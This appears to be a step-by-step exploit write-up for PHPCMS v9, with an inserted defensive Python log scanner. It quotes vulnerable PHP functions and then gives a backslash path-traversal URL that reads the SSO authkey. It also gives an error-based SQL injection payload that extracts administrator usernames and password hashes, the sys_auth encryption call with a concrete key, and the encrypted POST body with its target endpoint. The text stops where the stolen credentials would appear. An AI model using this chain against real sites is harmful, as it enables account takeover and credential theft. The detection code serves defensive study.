- /api/get_menu.php

```php
function ajax_getlist() {
    $cachefile = $_GET['cachefile'];
    // Only forward slashes are stripped; backslashes and ".." pass through untouched
    $cachefile = str_replace(array('/', '//'), '', $cachefile);
    //$cachefile = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $cachefile);
    $path = $_GET['path'];
    $path = str_replace(array('/', '//'), '', $path);
    //$path = preg_replace('/[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]+/S', '', $path);
    $title = $_GET['title'];
    $key = $_GET['key'];
    // Both arguments reach getcache() under attacker control
    $infos = getcache($cachefile, $path);
    // ... (rest of the function is not part of the original excerpt)
}
```

Both parameters passed to getcache() are user-controlled, so a configuration file under the caches directory can be included and the authkey read from it. With the authkey in hand, SQL injection becomes possible.
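The weakness in the snippet above is that the filter only removes forward slashes. As an added example that is not part of the original write-up, the Python below models that filter, shows a strict allow-list check in its place, and scans constructed sample log lines for requests of this shape (the sample URLs and the identifier pattern are assumptions):

```python
import re
from urllib.parse import parse_qs, urlparse

# Cache names in this write-up are bare identifiers such as "applist" or "admin"
# (assumption: adjust the pattern to the real naming scheme of a deployment).
SAFE_NAME = re.compile(r'[A-Za-z0-9_]+')

def weak_filter(value: str) -> str:
    """Models the original str_replace(array('/', '//'), '', ...) call."""
    return value.replace('/', '')

def is_safe_cache_name(value: str) -> bool:
    """Allow-list check: reject anything that is not a bare identifier."""
    return SAFE_NAME.fullmatch(value) is not None

def flag_request(url: str) -> list:
    """Return reasons an access-log URL should be flagged; empty list means clean."""
    params = parse_qs(urlparse(url).query)
    reasons = []
    for name in ('cachefile', 'path'):
        for raw in params.get(name, []):
            value = weak_filter(raw)   # what the vulnerable code would actually use
            if not is_safe_cache_name(value):
                reasons.append(f'{name} is not a bare cache name: {value!r}')
            if '..' in value or '\\' in value:
                reasons.append(f'{name} contains path traversal')
    if params.get('key') == ['authkey']:
        reasons.append('request asks for the authkey entry')
    return reasons

# Constructed sample log lines: the first is the traversal URL from the write-up,
# the second is a normal menu request.
SAMPLE_LOG = [
    r'http://10.211.55.12/phpcms/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin&key=authkey',
    'http://10.211.55.12/phpcms/api.php?op=get_menu&act=ajax_getlist&callback=cb&parentid=0&cachefile=menu&path=admin&key=title',
]

def scan(urls):
    """Map each URL to its list of findings."""
    return {u: flag_request(u) for u in urls}

if __name__ == '__main__':
    for url, hits in scan(SAMPLE_LOG).items():
        print('FLAG' if hits else 'ok  ', url)
        for h in hits:
            print('   -', h)
```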
- /phpsso_server/phpcms/modules/phpsso/index.php

```php
public function getuserinfo($is_return = 0) {
    $this->uid = isset($this->data['uid']) ? $this->data['uid'] : '';
    $this->email = isset($this->data['email']) ? $this->data['email'] : '';
    if($this->uid > 0) {
        // uid is handed to the query without a type check or escaping
        $r = $this->db->get_one(array('uid'=>$this->uid));
    } elseif(!empty($this->username)) {
        $r = $this->db->get_one(array('username'=>$this->username));
    } elseif(!empty($this->email)) {
        $r = $this->db->get_one(array('email'=>$this->email));
    } else {
        return false;
    }
    // ... (rest of the function is not part of the original excerpt)
}
```

The uid is passed straight into the query, which results in an SQL injection vulnerability.
Visit the following URL to obtain the authkey:
http://10.211.55.12/phpcms/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin&key=authkey
Encrypt the following content with PHPCMS's built-in encryption function sys_auth:
uid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 and (select 1 from (select count(*),concat((select concat(username,'|',password,0x3a3a,encrypt)from v9_sso_admin limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
The call is:
echo sys_auth("uid=1' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 and (select 1 from (select count(*),concat((select concat(username,'|',password,0x3a3a,encrypt)from v9_sso_admin limit 1),floor(rand(0)*2))x from information_schema.tables group by x)a)#'", "ENCODE", "94n16bQt8F0900oowgpQENmCvCd69szh");
The result is:
Inject using Hackbar, with the following POST body:
data=ada8YbYCC4vW3ZUiLq9FHK4AU0W2Nrho-QpN_rBOBhf8MRIqj_GOZS5-EUBX8_oL6QlfTkvv84VuO_ZFa_JlrxiYgxai6qjiikU78vn90aH-jnD4Emx4LYPx2pCiuNB3HKUvKiykjtnZSwlBAlBdpGOTvYnoZOgiXFBcfPCf-ApPYyVlQCSoN0BS04yKgUdU8ijkulguiKwDR1jYzaFA_GLGtV-R1AkEKHNz9ImpH_QwIzAwd4SJdhrPgVej69CS_rLMfYNH7F1f174jzPjunyKfJCEgszsmoHys19fIVMyiABzRU6t_tzTjmX9xGFahK7nnFRx8cdC13aT0nMO9txLCL5f0uTS86kn2CXRa9rN_-8JLTl0hv9dNsNvVGSHk4ndz
sent to:
http://10.211.55.12/phpcms/phpsso_server/?m=phpsso&c=index&a=getuserinfo&appid=1
This yields the administrator's account name and password: